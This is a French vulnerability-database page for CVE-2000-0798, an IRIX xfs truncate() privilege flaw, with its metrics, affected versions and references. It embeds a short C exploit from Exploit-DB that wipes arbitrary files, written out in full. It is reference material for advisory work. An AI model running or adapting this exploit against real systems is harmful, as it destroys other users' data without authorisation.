CVE-2000-0798 : Détail

CVE-2000-0798

0.78%V3
Network
2000-09-21
02h00 +00:00
2006-06-25
22h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The truncate function in IRIX 6.x does not properly check for privileges when the file is in the xfs file system, which allows local users to delete the contents of arbitrary files.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 20137

Date de publication : 1997-01-31 23h00 +00:00
Auteur : Last Stage of Delirium
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/1540/info The truncate() system call on a number of versions of the IRIX operating system (with the xfs file system) does not properly check permissions before truncating a file, making it possible for unprivileged users to damage files to which they would otherwise not have write access. Although only versions 6.2, 6.3, and 6.4 are listed as vulnerable other versions may exhibit this behaviour as well. */ /*## copyright LAST STAGE OF DELIRIUM feb 1997 poland *://lsd-pl.net/ #*/ /*## truncate #*/ /* truncates any file on a xfs filesystem */ main(int argc,char **argv){ printf("copyright LAST STAGE OF DELIRIUM feb 1997 poland //lsd-pl.net\n"); printf("truncate for irix 6.2 6.3 6.4 IP:all\n\n"); if(argc!=2){ printf("usage: %s file\n",argv[0]); exit(-1); } if(!truncate(argv[1],0)) printf("file %s truncated\n",argv[1]); else perror("error"); }

Products Mentioned

Configuraton 0

Sgi>>Irix >> Version 6.2

Sgi>>Irix >> Version 6.3

Sgi>>Irix >> Version 6.4

Références

http://www.osvdb.org/8569
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/1540
Tags : vdb-entry, x_refsource_BID